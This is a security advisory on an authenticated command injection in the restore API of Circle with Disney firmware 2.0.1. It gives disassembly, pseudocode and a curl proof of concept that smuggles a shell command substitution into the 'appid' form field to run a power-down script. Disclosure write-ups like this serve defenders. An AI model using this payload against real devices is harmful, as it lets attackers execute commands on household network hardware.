Circle with Disney Restore API Command Injection Vulnerability

Summary

An exploitable vulnerability exists in the /api/CONFIG/restore functionality of Circle with Disney running firmware 2.0.1. Specially crafted network packets can cause an OS command injection. An attacker can send an HTTP request trigger this vulnerability.

Tested Versions

Circle with Disney 2.0.1

Product URLs

<https://meetcircle.com/&gt;

CVSSv3 Score

9.9 - CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

CWE

CWE-77: Improper Neutralization of Special Elements used in a Command (‘Command Injection’)

Details

The vulnerable code exists in the restore api handler of the “apid” deamon (“/api/CONFIG/restore”), function sub_417528:

.text:004176A4 loc_4176A4:
.text:004176A4                 lw      $v0, (dword_44CB3C - 0x450000)($v0)
.text:004176A8                 nop
.text:004176AC                 beqz    $v0, loc_4177A8
.text:004176B0                 li      $v0, 1
.text:004176B4                 beq     $s4, $v0, loc_417860
.text:004176B8                 lui     $a0, 0x43
.text:004176BC                 jal     strlen
.text:004176C0                 addiu   $a0, $s6, (byte_44CC40 - 0x450000)
.text:004176C4                 sltiu   $v0, 0x14
.text:004176C8                 bnez    $v0, loc_4177A8
.text:004176CC                 lui     $v0, 0x45
.text:004176D0                 la      $v0, byte_44CC40                 # appid
.text:004176D4                 sw      $v0, 0x200+var_1F0($sp)
.text:004176D8                 lui     $a2, 0x43
.text:004176DC                 li      $v0, 0x42
.text:004176E0                 lui     $a3, 0x43
.text:004176E4                 addiu   $a0, $sp, 0x200+var_148
.text:004176E8                 li      $a1, 0x80
.text:004176EC                 la      $a2, aSrestore_backu             # "%srestore_backup.sh /tmp/postfile.bin %s %d"
.text:004176F0                 la      $a3, aMntSharesUs_19             # "/mnt/shares/usr/bin/scripts/"
.text:004176F4                 jal     snprintf
.text:004176F8                 sw      $v0, 0x200+var_1EC($sp)
.text:004176FC                 jal     system
.text:00417700                 addiu   $a0, $sp, 0x200+var_148

Looking at the pseudocode of the whole function, we see the following:

if (memcmp(request_url, "/api/CONFIG/restore", 18) == 0)
    if (stat("/mnt/shares/usr/bin/app_list") == 0)
        if (auth_token[0] != 0 && check_token(auth_token))
            if (strlen(appid) > 20) {
                snprintf(cmd, 128, "%srestore_backup.sh /tmp/postfile.bin %s %d", "/mnt/shares/usr/bin/scripts/", appid, 66);
                system(cmd);
            }

As we can see the appid parameter, coming from the user as a multipart parameter, is passed direcly to system call without any sanitization leading in that way to command injection. This API is accessible for authenticated users.

Exploit Proof-of-Concept

The following proof of concept shows how to execute the “power_down.sh” script on the device. An attacker needs use a valid token in order to trigger the vulnerability.

$ sAppid=$(python -c 'print "$(/etc/circle/power_down.sh)".ljust(20, "x")');
$ touch empty
$ curl -k "https://${sIP}:4567/api/CONFIG/restore" -F "token=${sToken}" -F "appid=${sAppid}" -F "upload=@empty"

Timeline

2017-08-29 - Vendor Disclosure
2017-10-31 - Public Release